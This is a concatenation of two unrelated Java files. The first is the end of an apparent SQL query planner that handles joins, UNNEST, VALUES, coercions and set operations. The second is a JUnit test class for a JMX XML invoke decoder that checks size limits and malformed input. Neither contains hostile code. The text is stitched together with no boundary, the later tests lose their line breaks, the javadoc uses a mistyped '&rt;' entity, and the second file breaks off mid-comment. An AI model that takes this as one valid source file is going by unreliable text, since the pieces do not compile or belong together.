                    .addAll(leftCoercion.getOutputVariables())
                    .addAll(rightCoercion.getOutputVariables())
                    .build(),
            Optional.empty(),
            Optional.empty(),
            Optional.empty(),
            Optional.empty());

    // Add a projection to produce the outputs of the columns in the USING clause,
    // which are defined as coalesce(l.k, r.k)
    Assignments.Builder assignments = Assignments.builder();

    ImmutableList.Builder<VariableReferenceExpression> outputs = ImmutableList.builder();
    for (Identifier column : joinColumns) {
        VariableReferenceExpression output = variableAllocator.newVariable(column, analysis.getType(column));
        outputs.add(output);
        assignments.put(output, castToRowExpression(new CoalesceExpression(
                new SymbolReference(leftJoinColumns.get(column).getName()),
                new SymbolReference(rightJoinColumns.get(column).getName()))));
    }

    for (int field : joinAnalysis.getOtherLeftFields()) {
        VariableReferenceExpression variable = left.getFieldMappings().get(field);
        outputs.add(variable);
        assignments.put(variable, castToRowExpression(new SymbolReference(variable.getName())));
    }

    for (int field : joinAnalysis.getOtherRightFields()) {
        VariableReferenceExpression variable = right.getFieldMappings().get(field);
        outputs.add(variable);
        assignments.put(variable, castToRowExpression(new SymbolReference(variable.getName())));
    }

    return new RelationPlan(
            new ProjectNode(idAllocator.getNextId(), join, assignments.build()),
            analysis.getScope(node),
            outputs.build());
}

// Unwraps aliases to find an UNNEST relation, if any.
private Optional<Unnest> getUnnest(Relation relation)
{
    if (relation instanceof AliasedRelation) {
        return getUnnest(((AliasedRelation) relation).getRelation());
    }
    if (relation instanceof Unnest) {
        return Optional.of((Unnest) relation);
    }
    return Optional.empty();
}

// Unwraps aliases to find a LATERAL relation, if any.
private Optional<Lateral> getLateral(Relation relation)
{
    if (relation instanceof AliasedRelation) {
        return getLateral(((AliasedRelation) relation).getRelation());
    }
    if (relation instanceof Lateral) {
        return Optional.of((Lateral) relation);
    }
    return Optional.empty();
}

// Plans "l CROSS JOIN LATERAL (query)" via the subquery planner's lateral-join support.
private RelationPlan planLateralJoin(Join join, RelationPlan leftPlan, Lateral lateral)
{
    RelationPlan rightPlan = process(lateral.getQuery(), null);
    PlanBuilder leftPlanBuilder = initializePlanBuilder(leftPlan);
    PlanBuilder rightPlanBuilder = initializePlanBuilder(rightPlan);

    PlanBuilder planBuilder = subqueryPlanner.appendLateralJoin(leftPlanBuilder, rightPlanBuilder, lateral.getQuery(), true, LateralJoinNode.Type.INNER);

    List<VariableReferenceExpression> outputVariables = ImmutableList.<VariableReferenceExpression>builder()
            .addAll(leftPlan.getRoot().getOutputVariables())
            .addAll(rightPlan.getRoot().getOutputVariables())
            .build();
    return new RelationPlan(planBuilder.getRoot(), analysis.getScope(join), outputVariables);
}

// Plans "l CROSS JOIN UNNEST(...)": projects the unnest arguments on the left plan,
// then maps each argument variable to the variables its elements unnest into.
private RelationPlan planCrossJoinUnnest(RelationPlan leftPlan, Join joinNode, Unnest node)
{
    RelationType unnestOutputDescriptor = analysis.getOutputDescriptor(node);
    // Create variables for the result of unnesting
    ImmutableList.Builder<VariableReferenceExpression> unnestedVariablesBuilder = ImmutableList.builder();
    for (Field field : unnestOutputDescriptor.getVisibleFields()) {
        VariableReferenceExpression variable = variableAllocator.newVariable(field);
        unnestedVariablesBuilder.add(variable);
    }
    ImmutableList<VariableReferenceExpression> unnestedVariables = unnestedVariablesBuilder.build();

    // Add a projection for all the unnest arguments
    PlanBuilder planBuilder = initializePlanBuilder(leftPlan);
    planBuilder = planBuilder.appendProjections(node.getExpressions(), variableAllocator, idAllocator);
    TranslationMap translations = planBuilder.getTranslations();
    ProjectNode projectNode = (ProjectNode) planBuilder.getRoot();

    ImmutableMap.Builder<VariableReferenceExpression, List<VariableReferenceExpression>> unnestVariables = ImmutableMap.builder();
    UnmodifiableIterator<VariableReferenceExpression> unnestedVariablesIterator = unnestedVariables.iterator();
    for (Expression expression : node.getExpressions()) {
        Type type = analysis.getType(expression);
        VariableReferenceExpression inputVariable = new VariableReferenceExpression(translations.get(expression).getName(), type);
        if (type instanceof ArrayType) {
            Type elementType = ((ArrayType) type).getElementType();
            // array(row(...)) unnests into one output variable per row field
            // (unless legacy-unnest semantics are enabled for the session).
            if (!SystemSessionProperties.isLegacyUnnest(session) && elementType instanceof RowType) {
                ImmutableList.Builder<VariableReferenceExpression> unnestVariableBuilder = ImmutableList.builder();
                for (int i = 0; i < ((RowType) elementType).getFields().size(); i++) {
                    unnestVariableBuilder.add(unnestedVariablesIterator.next());
                }
                unnestVariables.put(inputVariable, unnestVariableBuilder.build());
            }
            else {
                unnestVariables.put(inputVariable, ImmutableList.of(unnestedVariablesIterator.next()));
            }
        }
        else if (type instanceof MapType) {
            // A map unnests into a (key, value) pair of output variables.
            unnestVariables.put(inputVariable, ImmutableList.of(unnestedVariablesIterator.next(), unnestedVariablesIterator.next()));
        }
        else {
            throw new IllegalArgumentException("Unsupported type for UNNEST: " + type);
        }
    }
    Optional<VariableReferenceExpression> ordinalityVariable = node.isWithOrdinality() ? Optional.of(unnestedVariablesIterator.next()) : Optional.empty();
    checkState(!unnestedVariablesIterator.hasNext(), "Not all output variables were matched with input variables");

    UnnestNode unnestNode = new UnnestNode(idAllocator.getNextId(), projectNode, leftPlan.getFieldMappings(), unnestVariables.build(), ordinalityVariable);
    return new RelationPlan(unnestNode, analysis.getScope(joinNode), unnestNode.getOutputVariables());
}

// A table subquery plans as its inner query.
@Override
protected RelationPlan visitTableSubquery(TableSubquery node, Void context)
{
    return process(node.getQuery(), context);
}

// Delegates full query planning to a fresh QueryPlanner with the same collaborators.
@Override
protected RelationPlan visitQuery(Query node, Void context)
{
    return new QueryPlanner(analysis, variableAllocator, idAllocator, lambdaDeclarationToVariableMap, metadata, session)
            .plan(node);
}

// Delegates query-specification planning to a fresh QueryPlanner.
@Override
protected RelationPlan visitQuerySpecification(QuerySpecification node, Void context)
{
    return new QueryPlanner(analysis, variableAllocator, idAllocator, lambdaDeclarationToVariableMap, metadata, session)
            .plan(node);
}

// Plans a VALUES literal relation, applying analyzed coercions and parameter
// substitution to every item before building the ValuesNode.
@Override
protected RelationPlan visitValues(Values node, Void context)
{
    Scope scope = analysis.getScope(node);
    ImmutableList.Builder<VariableReferenceExpression> outputVariablesBuilder = ImmutableList.builder();
    for (Field field : scope.getRelationType().getVisibleFields()) {
        outputVariablesBuilder.add(variableAllocator.newVariable(field));
    }

    ImmutableList.Builder<List<RowExpression>> rowsBuilder = ImmutableList.builder();
    for (Expression row : node.getRows()) {
        ImmutableList.Builder<RowExpression> values = ImmutableList.builder();
        if (row instanceof Row) {
            for (Expression item : ((Row) row).getItems()) {
                Expression expression = Coercer.addCoercions(item, analysis);
                values.add(castToRowExpression(ExpressionTreeRewriter.rewriteWith(new ParameterRewriter(analysis.getParameters(), analysis), expression)));
            }
        }
        else {
            // single-column row: the row expression itself is the only value
            Expression expression = Coercer.addCoercions(row, analysis);
            values.add(castToRowExpression(ExpressionTreeRewriter.rewriteWith(new ParameterRewriter(analysis.getParameters(), analysis), expression)));
        }
        rowsBuilder.add(values.build());
    }

    ValuesNode valuesNode = new ValuesNode(idAllocator.getNextId(), outputVariablesBuilder.build(), rowsBuilder.build());
    return new RelationPlan(valuesNode, scope, outputVariablesBuilder.build());
}

// Plans a standalone UNNEST (outside a join): the arguments must be constants,
// so they are evaluated via a single-row ValuesNode feeding the UnnestNode.
@Override
protected RelationPlan visitUnnest(Unnest node, Void context)
{
    Scope scope = analysis.getScope(node);
    ImmutableList.Builder<VariableReferenceExpression> outputVariablesBuilder = ImmutableList.builder();
    for (Field field : scope.getRelationType().getVisibleFields()) {
        VariableReferenceExpression variable = variableAllocator.newVariable(field);
        outputVariablesBuilder.add(variable);
    }
    List<VariableReferenceExpression> unnestedVariables = outputVariablesBuilder.build();

    // If we got here, then we must be unnesting a constant, and not be in a join (where there could be column references)
    ImmutableList.Builder<VariableReferenceExpression> argumentVariables = ImmutableList.builder();
    ImmutableList.Builder<RowExpression> values = ImmutableList.builder();
    ImmutableMap.Builder<VariableReferenceExpression, List<VariableReferenceExpression>> unnestVariables = ImmutableMap.builder();
    Iterator<VariableReferenceExpression> unnestedVariablesIterator = unnestedVariables.iterator();
    for (Expression expression : node.getExpressions()) {
        Type type = analysis.getType(expression);
        Expression rewritten = Coercer.addCoercions(expression, analysis);
        rewritten = ExpressionTreeRewriter.rewriteWith(new ParameterRewriter(analysis.getParameters(), analysis), rewritten);
        values.add(castToRowExpression(rewritten));
        VariableReferenceExpression input = variableAllocator.newVariable(rewritten, type);
        argumentVariables.add(new VariableReferenceExpression(input.getName(), type));
        if (type instanceof ArrayType) {
            Type elementType = ((ArrayType) type).getElementType();
            // Same element-variable mapping scheme as planCrossJoinUnnest above.
            if (!SystemSessionProperties.isLegacyUnnest(session) && elementType instanceof RowType) {
                ImmutableList.Builder<VariableReferenceExpression> unnestVariableBuilder = ImmutableList.builder();
                for (int i = 0; i < ((RowType) elementType).getFields().size(); i++) {
                    unnestVariableBuilder.add(unnestedVariablesIterator.next());
                }
                unnestVariables.put(input, unnestVariableBuilder.build());
            }
            else {
                unnestVariables.put(input, ImmutableList.of(unnestedVariablesIterator.next()));
            }
        }
        else if (type instanceof MapType) {
            unnestVariables.put(input, ImmutableList.of(unnestedVariablesIterator.next(), unnestedVariablesIterator.next()));
        }
        else {
            throw new IllegalArgumentException("Unsupported type for UNNEST: " + type);
        }
    }
    Optional<VariableReferenceExpression> ordinalityVariable = node.isWithOrdinality() ? Optional.of(unnestedVariablesIterator.next()) : Optional.empty();
    checkState(!unnestedVariablesIterator.hasNext(), "Not all output variables were matched with input variables");
    ValuesNode valuesNode = new ValuesNode(
            idAllocator.getNextId(),
            argumentVariables.build(),
            ImmutableList.of(values.build()));

    UnnestNode unnestNode = new UnnestNode(idAllocator.getNextId(), valuesNode, ImmutableList.of(), unnestVariables.build(), ordinalityVariable);
    return new RelationPlan(unnestNode, scope, unnestedVariables);
}

// Plans a relation and, if the analyzer recorded target types for it, applies coercions.
private RelationPlan processAndCoerceIfNecessary(Relation node, Void context)
{
    Type[] coerceToTypes = analysis.getRelationCoercion(node);

    RelationPlan plan = this.process(node, context);

    if (coerceToTypes == null) {
        return plan;
    }

    return addCoercions(plan, coerceToTypes);
}

// Wraps the plan in a projection that casts each visible field to the given target type,
// producing a fresh anonymous relation scope with the coerced field types.
private RelationPlan addCoercions(RelationPlan plan, Type[] targetColumnTypes)
{
    RelationType oldRelation = plan.getDescriptor();
    List<VariableReferenceExpression> oldVisibleVariables = oldRelation.getVisibleFields().stream()
            .map(oldRelation::indexOf)
            .map(plan.getFieldMappings()::get)
            .collect(toImmutableList());
    RelationType oldRelationWithVisibleFields = plan.getDescriptor().withOnlyVisibleFields();
    verify(targetColumnTypes.length == oldVisibleVariables.size());
    ImmutableList.Builder<VariableReferenceExpression> newVariables = new ImmutableList.Builder<>();
    Field[] newFields = new Field[targetColumnTypes.length];
    Assignments.Builder assignments = Assignments.builder();
    for (int i = 0; i < targetColumnTypes.length; i++) {
        VariableReferenceExpression inputVariable = oldVisibleVariables.get(i);
        Type outputType = targetColumnTypes[i];
        if (!outputType.equals(inputVariable.getType())) {
            // type differs: project an explicit CAST to the target type
            Expression cast = new Cast(new SymbolReference(inputVariable.getName()), outputType.getTypeSignature().toString());
            VariableReferenceExpression outputVariable = variableAllocator.newVariable(cast, outputType);
            assignments.put(outputVariable, castToRowExpression(cast));
            newVariables.add(outputVariable);
        }
        else {
            // same type: identity projection under a fresh variable
            SymbolReference symbolReference = new SymbolReference(inputVariable.getName());
            VariableReferenceExpression outputVariable = variableAllocator.newVariable(symbolReference, outputType);
            assignments.put(outputVariable, castToRowExpression(symbolReference));
            newVariables.add(outputVariable);
        }
        Field oldField = oldRelationWithVisibleFields.getFieldByIndex(i);
        newFields[i] = new Field(
                oldField.getRelationAlias(),
                oldField.getName(),
                targetColumnTypes[i],
                oldField.isHidden(),
                oldField.getOriginTable(),
                oldField.getOriginColumnName(),
                oldField.isAliased());
    }
    ProjectNode projectNode = new ProjectNode(idAllocator.getNextId(), plan.getRoot(), assignments.build());
    return new RelationPlan(projectNode, Scope.builder().withRelationType(RelationId.anonymous(), new RelationType(newFields)).build(), newVariables.build());
}

// Plans UNION [DISTINCT|ALL]; DISTINCT adds a de-duplicating aggregation on top.
@Override
protected RelationPlan visitUnion(Union node, Void context)
{
    checkArgument(!node.getRelations().isEmpty(), "No relations specified for UNION");

    SetOperationPlan setOperationPlan = process(node);

    PlanNode planNode = new UnionNode(idAllocator.getNextId(), setOperationPlan.getSources(), setOperationPlan.getOutputVariables(), setOperationPlan.getVariableMapping());
    if (node.isDistinct()) {
        planNode = distinct(planNode);
    }
    return new RelationPlan(planNode, analysis.getScope(node), planNode.getOutputVariables());
}

// Plans INTERSECT over the coerced child relations.
@Override
protected RelationPlan visitIntersect(Intersect node, Void context)
{
    checkArgument(!node.getRelations().isEmpty(), "No relations specified for INTERSECT");

    SetOperationPlan setOperationPlan = process(node);

    PlanNode planNode = new IntersectNode(idAllocator.getNextId(), setOperationPlan.getSources(), setOperationPlan.getOutputVariables(), setOperationPlan.getVariableMapping());
    return new RelationPlan(planNode, analysis.getScope(node), planNode.getOutputVariables());
}

// Plans EXCEPT over the coerced child relations.
@Override
protected RelationPlan visitExcept(Except node, Void context)
{
    checkArgument(!node.getRelations().isEmpty(), "No relations specified for EXCEPT");

    SetOperationPlan setOperationPlan = process(node);

    PlanNode planNode = new ExceptNode(idAllocator.getNextId(), setOperationPlan.getSources(), setOperationPlan.getOutputVariables(), setOperationPlan.getVariableMapping());
    return new RelationPlan(planNode, analysis.getScope(node), planNode.getOutputVariables());
}

// Shared helper for UNION/INTERSECT/EXCEPT: plans every child relation (with
// coercions), derives output variables from the first child, and records the
// output-to-child variable mapping for each source.
private SetOperationPlan process(SetOperation node)
{
    List<VariableReferenceExpression> outputs = null;
    ImmutableList.Builder<PlanNode> sources = ImmutableList.builder();
    ImmutableListMultimap.Builder<VariableReferenceExpression, VariableReferenceExpression> variableMapping = ImmutableListMultimap.builder();

    List<RelationPlan> subPlans = node.getRelations().stream()
            .map(relation -> processAndCoerceIfNecessary(relation, null))
            .collect(toImmutableList());

    for (RelationPlan relationPlan : subPlans) {
        List<VariableReferenceExpression> childOutputVariables = relationPlan.getFieldMappings();
        if (outputs == null) {
            // Use the first Relation to derive output variable names
            RelationType descriptor = relationPlan.getDescriptor();
            ImmutableList.Builder<VariableReferenceExpression> outputVariableBuilder = ImmutableList.builder();
            for (Field field : descriptor.getVisibleFields()) {
                int fieldIndex = descriptor.indexOf(field);
                VariableReferenceExpression variable = childOutputVariables.get(fieldIndex);
                outputVariableBuilder.add(variableAllocator.newVariable(variable));
            }
            outputs = outputVariableBuilder.build();
        }

        RelationType descriptor = relationPlan.getDescriptor();
        checkArgument(descriptor.getVisibleFieldCount() == outputs.size(),
                "Expected relation to have %s variables but has %s variables",
                descriptor.getVisibleFieldCount(),
                outputs.size());

        int fieldId = 0;
        for (Field field : descriptor.getVisibleFields()) {
            int fieldIndex = descriptor.indexOf(field);
            variableMapping.put(outputs.get(fieldId), childOutputVariables.get(fieldIndex));
            fieldId++;
        }

        sources.add(relationPlan.getRoot());
    }

    return new SetOperationPlan(sources.build(), variableMapping.build());
}

// Builds a PlanBuilder over a relation plan, pre-seeding its translation map with
// the relation's field-to-variable mappings.
private PlanBuilder initializePlanBuilder(RelationPlan relationPlan)
{
    TranslationMap translations = new TranslationMap(relationPlan, analysis, lambdaDeclarationToVariableMap);

    // Make field->variable mapping from underlying relation plan available for translations
    // This makes it possible to rewrite FieldOrExpressions that reference fields from the underlying tuple directly
    translations.setFieldMappings(relationPlan.getFieldMappings());

    return new PlanBuilder(translations, relationPlan.getRoot(), analysis.getParameters());
}

// De-duplicates a plan's output by grouping on all of its output variables.
private PlanNode distinct(PlanNode node)
{
    return new AggregationNode(idAllocator.getNextId(),
            node,
            ImmutableMap.of(),
            singleGroupingSet(node.getOutputVariables()),
            ImmutableList.of(),
            AggregationNode.Step.SINGLE,
            Optional.empty(),
            Optional.empty());
}

// Value holder for a planned set operation: the child plans, the derived output
// variables, and the mapping from each output variable to its per-child inputs.
private static class SetOperationPlan
{
    private final List<PlanNode> sources;
    private final List<VariableReferenceExpression> outputVariables;
    private final Map<VariableReferenceExpression, List<VariableReferenceExpression>> variableMapping;

    private SetOperationPlan(List<PlanNode> sources, ListMultimap<VariableReferenceExpression, VariableReferenceExpression> variableMapping)
    {
        this.sources = sources;
        this.outputVariables = ImmutableList.copyOf(variableMapping.keySet());
        // Flatten the multimap into an insertion-ordered Map of lists.
        Map<VariableReferenceExpression, List<VariableReferenceExpression>> mapping = new LinkedHashMap<>();
        variableMapping.asMap().forEach((key, value) -> {
            checkState(value instanceof List, "variableMapping values should be of type List");
            mapping.put(key, (List<VariableReferenceExpression>) value);
        });
        this.variableMapping = mapping;
    }

    public List<PlanNode> getSources()
    {
        return sources;
    }

    public List<VariableReferenceExpression> getOutputVariables()
    {
        return outputVariables;
    }

    public Map<VariableReferenceExpression, List<VariableReferenceExpression>> getVariableMapping()
    {
        return variableMapping;
    }
}
}
/**
 * Copyright (c) Microsoft Corporation
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not use
 * this file except in compliance with the License. You may obtain a copy of the
 * License at http://www.apache.org/licenses/LICENSE-2.0.
 *
 * THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
 * OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION
 * ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
 * MERCHANTABLITY OR NON-INFRINGEMENT.
 *
 * See the Apache Version 2.0 License for specific language governing
 * permissions and limitations under the License.
 */

package com.interopbridges.scx.xml;

import java.io.StringReader;
import java.io.BufferedReader;

import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;

import com.interopbridges.scx.ScxException;
import com.interopbridges.scx.ScxExceptionCode;
import com.interopbridges.scx.util.JmxConstant;

/**
 * Testing the XML decoder associated with the POST request to Invoke a MBean method.<br>
 *
 * @author Geoff Erasmus
 *
 */
public class InvokeDecoderTest
{
    /**
     * <p>
     * Test Setup/preparation method that resets/initializes all test specific
     * variables.
     * </p>
     */
    @Before
    public void setup()
    {
        // No shared fixtures required; each test builds its own decoder input.
    }

    /**
     * <p>
     * Method invoked after each unit-test in this class.
     * </p>
     */
    @After
    public void TearDown()
    {
        // Nothing to clean up; tests do not allocate external resources.
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the correct amount of data. <br>
     * If the buffer does not contain the amount of data specified an error should be thrown.
     * </p>
     */
    @Test
    public void verifyTooLittleBodyData() throws Exception
    {
        try
        {
            // We expect 100 chars of data but only supply 8
            new InvokeDecoder(new BufferedReader(new StringReader("a string")), 100);
            Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder.");
        }
        catch(Exception e)
        {
            Assert.assertTrue(
                    "An SCXException should have been thrown indicating too little data was read",
                    (e.getClass() == ScxException.class)&&
                    (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML)));
        }
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the correct amount of data. <br>
     * If the buffer contains more data than the amount specified, the extraneous data will be ignored.
     * </p>
     */
    @Test
    public void verifyExtraBodyData() throws Exception
    {
        // Buffer holds 8 chars but only 5 are requested; decoder should keep exactly 5.
        String str = "a string";
        InvokeDecoder id = new InvokeDecoder(new BufferedReader(new StringReader(str)), 5);
        Assert.assertEquals(
                "Instantiation of InvokeDecoder for a buffer containing extraneous data failed",
                5, id.getRawInputData().length());
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the correct amount of data. <br>
     * If the size specified is 0 an error should be thrown.
     * </p>
     */
    @Test
    public void verifyNoBodyData() throws Exception
    {
        BufferedReader br = new BufferedReader(new StringReader("a string"));
        try
        {
            new InvokeDecoder(br, 0);
            Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder.");
        }
        catch(Exception e)
        {
            Assert.assertTrue(
                    "An exception should have been thrown indicating the input length is zero",
                    (e.getClass() == ScxException.class)&&
                    (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_INVOKE_NO_BODY)));
        }
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the correct amount of data. <br>
     * If the input BufferedReader is not specified an error should be thrown.
     * </p>
     */
    @Test
    public void verifyNoReader() throws Exception
    {
        // A null reader is rejected with the same ERROR_INVOKE_NO_BODY code as zero length.
        try
        {
            new InvokeDecoder(null, 0);
            Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder.");
        }
        catch(Exception e)
        {
            Assert.assertTrue(
                    "An exception should have been thrown indicating the input length is zero",
                    (e.getClass() == ScxException.class)&&
                    (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_INVOKE_NO_BODY)));
        }
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the correct amount of data. <br>
     * If the length of the data exceeds the maximum allowed an error is thrown.
     * </p>
     */
    @Test
    public void verifyTooMuchBodyData() throws Exception
    {
        BufferedReader br = new BufferedReader(new StringReader("a string"));
        try
        {
            // One byte over the configured maximum must be rejected up front.
            new InvokeDecoder(br, JmxConstant.MAX_POST_INPUT_XML_SIZE + 1);
            Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder.");
        }
        catch(Exception e)
        {
            Assert.assertTrue(
                    "An exception should have been thrown indicating the input length is too big.",
                    (e.getClass() == ScxException.class)&&
                    (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_INVOKE_BODY_TOO_LARGE)));
        }
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the correct Invoke XML element. <br>
     * </p>
     *
     * <p>
     * Ideally, the XML would look something like this:<br>
     * </pre>
     * &lt;Invoke&rt;
     *     &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt;
     *     &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt;
     * &lt;/Invoke&rt;"
     * </p>
     */
    @Test
    public void verifyXMLInvokeElement() throws Exception
    {
        // Root element is deliberately wrong ("aInvoke") to trigger a malformed-XML error.
        StringBuffer XMLData = new StringBuffer().
                append("<aInvoke>").
                append("<BeanObjectName>TestMBean</BeanObjectName>").
                append("<Method name=\"VoidVoidMethod\"></Method>").
                append("</aInvoke>");

        BufferedReader br = new BufferedReader(new StringReader(XMLData.toString()));
        try
        {
            InvokeDecoder id = new InvokeDecoder(br, XMLData.length());
            id.DecodeInput();
            Assert.fail("Failed to receive an exception on decoding the XML input");
        }
        catch(Exception e)
        {
            Assert.assertTrue(
                    "An exception should have been thrown indicating XML input is incorrect.",
                    (e.getClass() == ScxException.class)&&
                    (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML)));
        }
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the Invoke XML element. <br>
     * </p>
     *
     * <p>
     * Ideally, the XML would look something like this:<br>
     * </pre>
     * &lt;Invoke&rt;
     *     &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt;
     *     &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt;
     * &lt;/Invoke&rt;"
     * </p>
     */
    @Test
    public void verifyXMLInvokeElementExists() throws Exception
    {
        // The wrapping <Invoke> element is missing entirely; decoding must fail.
        StringBuffer XMLData = new StringBuffer().
                append("<BeanObjectName>TestMBean</BeanObjectName>").
                append("<Method name=\"VoidVoidMethod\"></Method>");

        BufferedReader br = new BufferedReader(new StringReader(XMLData.toString()));
        try
        {
            InvokeDecoder id = new InvokeDecoder(br, XMLData.length());
            id.DecodeInput();
            Assert.fail("Failed to receive an exception on decoding the XML input");
        }
        catch(Exception e)
        {
            Assert.assertTrue(
                    "An exception should have been thrown indicating XML input is incorrect.",
                    (e.getClass() == ScxException.class)&&
                    (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML)));
        }
    }

    /**
     * <p>
     * Verify the input stream is valid and contains the BeanObjectName XML element. <br>
     * </p>
     *
     * <p>
     * Ideally, the XML would look something like this:<br>
     * </pre>
     * &lt;Invoke&rt;
     *     &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt;
     *     &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt;
     * &lt;/Invoke&rt;"
     * </p>
     */
    @Test
    public void verifyXMLBeanObjectNameElementExists() throws Exception
    {
        StringBuffer XMLData = new StringBuffer().
append("<Invoke>"). append("<Method name=\"VoidVoidMethod\"></Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct BeanObjectName XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLBeanObjectNameElement() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<aBeanObjectName>TestMBean</aBeanObjectName>"). append("<Method name=\"VoidVoidMethod\"></Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the Method XML element. 
<br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLMethodElementExists() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<aMethod name=\"VoidVoidMethod\"></aMethod>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct Method XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXML_NoMethodElement() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). 
append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct Parameter Type attribute * if the parameter is specified. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLParamTypeAttributeMissing() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\">"). append("<Param>5</Param>"). append("</Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception while decoding the XML input."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct Parameter, * the parameter has no value. 
